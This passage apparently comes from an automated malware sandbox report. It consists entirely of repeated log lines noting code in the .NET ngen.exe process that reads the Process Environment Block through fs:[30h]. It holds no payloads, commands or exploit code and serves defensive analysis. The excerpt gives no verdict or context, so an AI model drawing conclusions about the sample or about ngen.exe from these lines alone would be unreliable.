            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B674D mov eax, dword ptr fs:[00000030h]4_2_058B674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05893740 mov eax, dword ptr fs:[00000030h]4_2_05893740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05893740 mov eax, dword ptr fs:[00000030h]4_2_05893740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05893740 mov eax, dword ptr fs:[00000030h]4_2_05893740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05880750 mov eax, dword ptr fs:[00000030h]4_2_05880750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2750 mov eax, dword ptr fs:[00000030h]4_2_058C2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2750 mov eax, dword ptr fs:[00000030h]4_2_058C2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05953749 mov eax, dword ptr fs:[00000030h]4_2_05953749
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587B765 mov eax, dword ptr fs:[00000030h]4_2_0587B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587B765 mov eax, dword ptr fs:[00000030h]4_2_0587B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587B765 mov eax, dword ptr fs:[00000030h]4_2_0587B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587B765 mov eax, dword ptr fs:[00000030h]4_2_0587B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05888770 mov eax, dword ptr fs:[00000030h]4_2_05888770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890770 mov eax, dword ptr fs:[00000030h]4_2_05890770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890770 mov eax, dword ptr fs:[00000030h]4_2_05890770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890770 mov eax, dword ptr fs:[00000030h]4_2_05890770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890770 mov eax, dword ptr fs:[00000030h]4_2_05890770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890770 mov eax, dword ptr fs:[00000030h]4_2_05890770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890770 mov eax, dword ptr fs:[00000030h]4_2_05890770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890770 mov eax, dword ptr fs:[00000030h]4_2_05890770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890770 mov eax, dword ptr fs:[00000030h]4_2_05890770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890770 mov eax, dword ptr fs:[00000030h]4_2_05890770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890770 mov eax, dword ptr fs:[00000030h]4_2_05890770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890770 mov eax, dword ptr fs:[00000030h]4_2_05890770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890770 mov eax, dword ptr fs:[00000030h]4_2_05890770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05884690 mov eax, dword ptr fs:[00000030h]4_2_05884690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05884690 mov eax, dword ptr fs:[00000030h]4_2_05884690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590368C mov eax, dword ptr fs:[00000030h]4_2_0590368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590368C mov eax, dword ptr fs:[00000030h]4_2_0590368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590368C mov eax, dword ptr fs:[00000030h]4_2_0590368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590368C mov eax, dword ptr fs:[00000030h]4_2_0590368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587D6AA mov eax, dword ptr fs:[00000030h]4_2_0587D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587D6AA mov eax, dword ptr fs:[00000030h]4_2_0587D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BC6A6 mov eax, dword ptr fs:[00000030h]4_2_058BC6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058776B2 mov eax, dword ptr fs:[00000030h]4_2_058776B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058776B2 mov eax, dword ptr fs:[00000030h]4_2_058776B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058776B2 mov eax, dword ptr fs:[00000030h]4_2_058776B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B66B0 mov eax, dword ptr fs:[00000030h]4_2_058B66B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B16CF mov eax, dword ptr fs:[00000030h]4_2_058B16CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h]4_2_0588B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h]4_2_0588B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h]4_2_0588B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h]4_2_0588B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h]4_2_0588B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h]4_2_0588B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BA6C7 mov ebx, dword ptr fs:[00000030h]4_2_058BA6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BA6C7 mov eax, dword ptr fs:[00000030h]4_2_058BA6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593F6C7 mov eax, dword ptr fs:[00000030h]4_2_0593F6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059416CC mov eax, dword ptr fs:[00000030h]4_2_059416CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059416CC mov eax, dword ptr fs:[00000030h]4_2_059416CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059416CC mov eax, dword ptr fs:[00000030h]4_2_059416CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059416CC mov eax, dword ptr fs:[00000030h]4_2_059416CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059006F1 mov eax, dword ptr fs:[00000030h]4_2_059006F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059006F1 mov eax, dword ptr fs:[00000030h]4_2_059006F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593D6F0 mov eax, dword ptr fs:[00000030h]4_2_0593D6F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B36EF mov eax, dword ptr fs:[00000030h]4_2_058B36EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AD6E0 mov eax, dword ptr fs:[00000030h]4_2_058AD6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AD6E0 mov eax, dword ptr fs:[00000030h]4_2_058AD6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FE6F2 mov eax, dword ptr fs:[00000030h]4_2_058FE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FE6F2 mov eax, dword ptr fs:[00000030h]4_2_058FE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FE6F2 mov eax, dword ptr fs:[00000030h]4_2_058FE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FE6F2 mov eax, dword ptr fs:[00000030h]4_2_058FE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059136EE mov eax, dword ptr fs:[00000030h]4_2_059136EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059136EE mov eax, dword ptr fs:[00000030h]4_2_059136EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059136EE mov eax, dword ptr fs:[00000030h]4_2_059136EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059136EE mov eax, dword ptr fs:[00000030h]4_2_059136EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059136EE mov eax, dword ptr fs:[00000030h]4_2_059136EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059136EE mov eax, dword ptr fs:[00000030h]4_2_059136EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589260B mov eax, dword ptr fs:[00000030h]4_2_0589260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589260B mov eax, dword ptr fs:[00000030h]4_2_0589260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589260B mov eax, dword ptr fs:[00000030h]4_2_0589260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589260B mov eax, dword ptr fs:[00000030h]4_2_0589260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589260B mov eax, dword ptr fs:[00000030h]4_2_0589260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589260B mov eax, dword ptr fs:[00000030h]4_2_0589260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589260B mov eax, dword ptr fs:[00000030h]4_2_0589260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FE609 mov eax, dword ptr fs:[00000030h]4_2_058FE609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BF603 mov eax, dword ptr fs:[00000030h]4_2_058BF603
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B1607 mov eax, dword ptr fs:[00000030h]4_2_058B1607
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2619 mov eax, dword ptr fs:[00000030h]4_2_058C2619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05883616 mov eax, dword ptr fs:[00000030h]4_2_05883616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05883616 mov eax, dword ptr fs:[00000030h]4_2_05883616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h]4_2_0587F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h]4_2_0587F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h]4_2_0587F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h]4_2_0587F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h]4_2_0587F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h]4_2_0587F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h]4_2_0587F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h]4_2_0587F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h]4_2_0587F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05955636 mov eax, dword ptr fs:[00000030h]4_2_05955636
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588262C mov eax, dword ptr fs:[00000030h]4_2_0588262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B6620 mov eax, dword ptr fs:[00000030h]4_2_058B6620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B8620 mov eax, dword ptr fs:[00000030h]4_2_058B8620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589E627 mov eax, dword ptr fs:[00000030h]4_2_0589E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589C640 mov eax, dword ptr fs:[00000030h]4_2_0589C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BA660 mov eax, dword ptr fs:[00000030h]4_2_058BA660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BA660 mov eax, dword ptr fs:[00000030h]4_2_058BA660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B9660 mov eax, dword ptr fs:[00000030h]4_2_058B9660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B9660 mov eax, dword ptr fs:[00000030h]4_2_058B9660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594866E mov eax, dword ptr fs:[00000030h]4_2_0594866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594866E mov eax, dword ptr fs:[00000030h]4_2_0594866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B2674 mov eax, dword ptr fs:[00000030h]4_2_058B2674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C0185 mov eax, dword ptr fs:[00000030h]4_2_058C0185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590019F mov eax, dword ptr fs:[00000030h]4_2_0590019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590019F mov eax, dword ptr fs:[00000030h]4_2_0590019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590019F mov eax, dword ptr fs:[00000030h]4_2_0590019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590019F mov eax, dword ptr fs:[00000030h]4_2_0590019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587A197 mov eax, dword ptr fs:[00000030h]4_2_0587A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587A197 mov eax, dword ptr fs:[00000030h]4_2_0587A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587A197 mov eax, dword ptr fs:[00000030h]4_2_0587A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593C188 mov eax, dword ptr fs:[00000030h]4_2_0593C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593C188 mov eax, dword ptr fs:[00000030h]4_2_0593C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058D7190 mov eax, dword ptr fs:[00000030h]4_2_058D7190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059311A4 mov eax, dword ptr fs:[00000030h]4_2_059311A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059311A4 mov eax, dword ptr fs:[00000030h]4_2_059311A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059311A4 mov eax, dword ptr fs:[00000030h]4_2_059311A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059311A4 mov eax, dword ptr fs:[00000030h]4_2_059311A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589B1B0 mov eax, dword ptr fs:[00000030h]4_2_0589B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059461C3 mov eax, dword ptr fs:[00000030h]4_2_059461C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059461C3 mov eax, dword ptr fs:[00000030h]4_2_059461C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BD1D0 mov eax, dword ptr fs:[00000030h]4_2_058BD1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BD1D0 mov ecx, dword ptr fs:[00000030h]4_2_058BD1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059551CB mov eax, dword ptr fs:[00000030h]4_2_059551CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FE1D0 mov eax, dword ptr fs:[00000030h]4_2_058FE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FE1D0 mov eax, dword ptr fs:[00000030h]4_2_058FE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FE1D0 mov ecx, dword ptr fs:[00000030h]4_2_058FE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FE1D0 mov eax, dword ptr fs:[00000030h]4_2_058FE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FE1D0 mov eax, dword ptr fs:[00000030h]4_2_058FE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h]4_2_058A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h]4_2_058A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h]4_2_058A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h]4_2_058A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h]4_2_058A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h]4_2_058A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h]4_2_058A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h]4_2_058A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h]4_2_058A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h]4_2_058A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h]4_2_058A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h]4_2_058A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h]4_2_058A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058851ED mov eax, dword ptr fs:[00000030h]4_2_058851ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059561E5 mov eax, dword ptr fs:[00000030h]4_2_059561E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B01F8 mov eax, dword ptr fs:[00000030h]4_2_058B01F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05940115 mov eax, dword ptr fs:[00000030h]4_2_05940115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592A118 mov ecx, dword ptr fs:[00000030h]4_2_0592A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592A118 mov eax, dword ptr fs:[00000030h]4_2_0592A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592A118 mov eax, dword ptr fs:[00000030h]4_2_0592A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592A118 mov eax, dword ptr fs:[00000030h]4_2_0592A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B0124 mov eax, dword ptr fs:[00000030h]4_2_058B0124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587B136 mov eax, dword ptr fs:[00000030h]4_2_0587B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587B136 mov eax, dword ptr fs:[00000030h]4_2_0587B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587B136 mov eax, dword ptr fs:[00000030h]4_2_0587B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587B136 mov eax, dword ptr fs:[00000030h]4_2_0587B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05881131 mov eax, dword ptr fs:[00000030h]4_2_05881131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05881131 mov eax, dword ptr fs:[00000030h]4_2_05881131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05955152 mov eax, dword ptr fs:[00000030h]4_2_05955152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05879148 mov eax, dword ptr fs:[00000030h]4_2_05879148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05879148 mov eax, dword ptr fs:[00000030h]4_2_05879148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05879148 mov eax, dword ptr fs:[00000030h]4_2_05879148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05879148 mov eax, dword ptr fs:[00000030h]4_2_05879148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587C156 mov eax, dword ptr fs:[00000030h]4_2_0587C156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05914144 mov eax, dword ptr fs:[00000030h]4_2_05914144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05914144 mov eax, dword ptr fs:[00000030h]4_2_05914144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05914144 mov ecx, dword ptr fs:[00000030h]4_2_05914144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05914144 mov eax, dword ptr fs:[00000030h]4_2_05914144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05914144 mov eax, dword ptr fs:[00000030h]4_2_05914144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05887152 mov eax, dword ptr fs:[00000030h]4_2_05887152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05886154 mov eax, dword ptr fs:[00000030h]4_2_05886154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05886154 mov eax, dword ptr fs:[00000030h]4_2_05886154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05919179 mov eax, dword ptr fs:[00000030h]4_2_05919179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
